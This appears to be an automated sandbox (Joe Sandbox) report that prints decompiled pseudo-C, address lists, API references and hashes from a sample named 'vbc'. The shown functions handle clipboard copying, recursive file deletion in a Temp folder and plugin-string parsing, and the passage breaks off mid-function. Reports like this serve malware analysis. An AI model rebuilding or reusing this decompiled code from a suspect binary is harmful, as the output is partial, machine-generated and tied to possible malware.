							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f48;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a2c == _t156) {
							ShowWindow( *0x7a8a68, 8);
							if( *0x7a8aec == _t156) {
								_t119 =  *0x7a0f20; // 0x9f0f84
								E0040557C( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040444F(_t171);
							goto L25;
						}
						 *0x7a0718 = 2;
						E0040444F(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044DD(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a30, _t156);
						ShowWindow(_t169, 8);
						E004044AB(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8a70;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a30 = GetDlgItem(_a4, 0x403);
				 *0x7a7a28 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a44 = _t134;
				_v8 = _t134;
				E004044AB( *0x7a7a30);
				 *0x7a7a34 = E00404E04(4);
				 *0x7a7a4c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404476(_a4);
				if(( *0x7a8a78 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a30, _t156);
					if(( *0x7a8a78 & 0x00000002) != 0) {
						 *0x7a7a30 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044AB( *0x7a7a28);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8a78 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056c3
0x004056c9
0x004056d3
0x004056d6
0x0040586c
0x00405889
0x00405890
0x00405890
0x004058a3
0x004058c1
0x004058c3
0x004058cb
0x00405921
0x00405925
0x00000000
0x00000000
0x00405927
0x0040592d
0x00000000
0x00000000
0x00405937
0x0040593f
0x00405942
0x00405a44
0x00000000
0x00405a44
0x00405951
0x0040595c
0x00405965
0x00405970
0x00405973
0x0040597c
0x00405982
0x00405985
0x00405985
0x0040599d
0x004059a6
0x004059a9
0x004059b0
0x004059b7
0x004059bf
0x004059bf
0x004059d6
0x004059d6
0x004059dd
0x004059e3
0x004059ef
0x004059f6
0x004059ff
0x00405a01
0x00405a04
0x00405a13
0x00405a16
0x00405a1c
0x00405a1d
0x00405a23
0x00405a24
0x00405a25
0x00405a2d
0x00405a38
0x00405a3e
0x00405a3e
0x00000000
0x0040599d
0x004058d3
0x00405903
0x0040590b
0x0040590d
0x00405916
0x00405916
0x0040591c
0x00000000
0x0040591c
0x004058d7
0x004058e1
0x00000000
0x004058a5
0x004058ab
0x004058e6
0x00000000
0x004058ef
0x004058b4
0x004058b9
0x004058bc
0x00000000
0x004058bc
0x004058a3
0x004056dc
0x004056e0
0x004056e8
0x004056ec
0x004056ef
0x004056f2
0x004056f5
0x004056f8
0x004056f9
0x004056fa
0x00405713
0x00405716
0x00405720
0x0040572f
0x00405737
0x0040573f
0x00405744
0x00405747
0x00405753
0x0040575c
0x00405765
0x00405787
0x0040578d
0x0040579e
0x004057a3
0x004057b1
0x004057bf
0x004057bf
0x004057c4
0x004057d2
0x004057d2
0x004057d7
0x004057da
0x004057df
0x004057eb
0x004057f4
0x00405801
0x00405810
0x00405803
0x00405808
0x00405808
0x0040581c
0x0040581c
0x00405830
0x00405839
0x00405842
0x00405852
0x0040585e
0x0040585e
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405719
GetDlgItem.USER32(?,000003EE), ref: 00405728
GetClientRect.USER32 ref: 00405765
GetSystemMetrics.USER32 ref: 0040576C
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040578D
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040579E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057B1
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057BF
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057D2
ShowWindow.USER32(00000000,?), ref: 004057F4
ShowWindow.USER32(?,00000008), ref: 00405808
GetDlgItem.USER32(?,000003EC), ref: 00405829
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405839
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405852
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040585E
GetDlgItem.USER32(?,000003F8), ref: 00405737

Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9

GetDlgItem.USER32(?,000003EC), ref: 0040587B
CreateThread.KERNELBASE(00000000,00000000,Function_0000564F,00000000), ref: 00405889
CloseHandle.KERNELBASE(00000000), ref: 00405890
ShowWindow.USER32(00000000), ref: 004058B4
ShowWindow.USER32(?,00000008), ref: 004058B9
ShowWindow.USER32(00000008), ref: 00405903
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405937
CreatePopupMenu.USER32 ref: 00405948
AppendMenuW.USER32 ref: 0040595C
GetWindowRect.USER32(?,?), ref: 0040597C
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405995
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059CD
OpenClipboard.USER32(00000000), ref: 004059DD
EmptyClipboard.USER32 ref: 004059E3
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059EF
GlobalLock.KERNEL32 ref: 004059F9
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0D
GlobalUnlock.KERNEL32(00000000), ref: 00405A2D
SetClipboardData.USER32 ref: 00405A38
CloseClipboard.USER32 ref: 00405A3E

Strings

{, xrefs: 00405921

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
Instruction ID: d7cac64708ae36737aaf404740c8a4e4a0ccfdbfd79e04772bb75515dd65aeb5
Opcode Fuzzy Hash: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
Instruction Fuzzy Hash: BFB14BB1900608FFDF11AF64DD89AAE7B79FB48354F00802AFA41B61A0CB795A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00405C26 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C26(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405EF1(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8ae8 =  *0x7a8ae8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040651A(0x7a3f50, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E35(_t68);
					} else {
						lstrcatW(0x7a3f50, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f50,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040651A(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405BDE(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040557C(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8ae8 =  *0x7a8ae8 + 1;
										} else {
											E0040557C(0xfffffff1, _t68);
											E004062DA(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C26(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x7a3f50 - 0x5c;
					if( *0x7a3f50 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406850(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405DE9(_t68);
							_t38 = E00405BDE(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040557C(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040557C(0xfffffff1, _t68);
							return E004062DA(_t67, _t68, 0);
						}
						L30:
						 *0x7a8ae8 =  *0x7a8ae8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c30
0x00405c35
0x00405c3e
0x00405c41
0x00405c49
0x00405c4c
0x00405c4f
0x00405c57
0x00405c59
0x00405c5a
0x00000000
0x00405c5a
0x00405c65
0x00405c68
0x00405c68
0x00405c68
0x00405c6c
0x00405c7f
0x00405c86
0x00405c8b
0x00405c8f
0x00405c9f
0x00405c91
0x00405c97
0x00405c97
0x00405ca4
0x00405ca8
0x00405cb4
0x00405cba
0x00405cbf
0x00405cc5
0x00405cd0
0x00405cd6
0x00405cd8
0x00405cdb
0x00405d85
0x00405d85
0x00405d89
0x00405d8b
0x00405d8b
0x00405d8b
0x00405d8b
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ce1
0x00405ce1
0x00405ce1
0x00405ce9
0x00405d09
0x00405d11
0x00405d16
0x00405d1d
0x00405d38
0x00405d3d
0x00405d3f
0x00405d63
0x00405d41
0x00405d41
0x00405d44
0x00405d58
0x00405d46
0x00405d49
0x00405d51
0x00405d51
0x00405d44
0x00405d1f
0x00405d25
0x00405d27
0x00405d2d
0x00405d2d
0x00405d27
0x00000000
0x00405d1d
0x00405ceb
0x00405cf3
0x00000000
0x00000000
0x00405cf5
0x00405cfd
0x00000000
0x00000000
0x00405cff
0x00405d07
0x00000000
0x00000000
0x00000000
0x00405d68
0x00405d70
0x00405d76
0x00405d76
0x00405d7f
0x00000000
0x00405d7f
0x00405caa
0x00405cb2
0x00000000
0x00000000
0x00000000
0x00405c6e
0x00405c6e
0x00405c70
0x00405d90
0x00405d92
0x00405d95
0x00405de6
0x00405de6
0x00405de6
0x00405d97
0x00405d9a
0x00405da5
0x00405daa
0x00405dac
0x00000000
0x00000000
0x00405daf
0x00405dbb
0x00405dc0
0x00405dc2
0x00000000
0x00405ddd
0x00405dc4
0x00405dc7
0x00000000
0x00000000
0x00405dcc
0x00000000
0x00405dd3
0x00405d9c
0x00405d9c
0x00000000
0x00405d9c
0x00405c76
0x00405c79
0x00000000
0x00000000
0x00000000
0x00405c79

APIs

DeleteFileW.KERNELBASE(?,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C4F
lstrcatW.KERNEL32 ref: 00405C97
lstrcatW.KERNEL32 ref: 00405CBA
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CC0
FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CD0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D70
FindClose.KERNEL32(00000000), ref: 00405D7F

Strings

., xrefs: 00405CF5
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C33
., xrefs: 00405CE1
\*.*, xrefs: 00405C91
P?z, xrefs: 00405C7F

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
API String ID: 2035342205-3834854073
Opcode ID: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
Opcode Fuzzy Hash: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 734F1BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E734F1BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E734F12BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E734F12BB();
				_t321 = E734F12E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E734F13B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E734F162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x734f23e8) & 0x000000ff) * 4 +  &M734F235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E734F12CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E734F12BB();
											 &_v12 = E734F1B86( &_v12);
											__eax = E734F1510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E734F1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E734F1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x734f405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
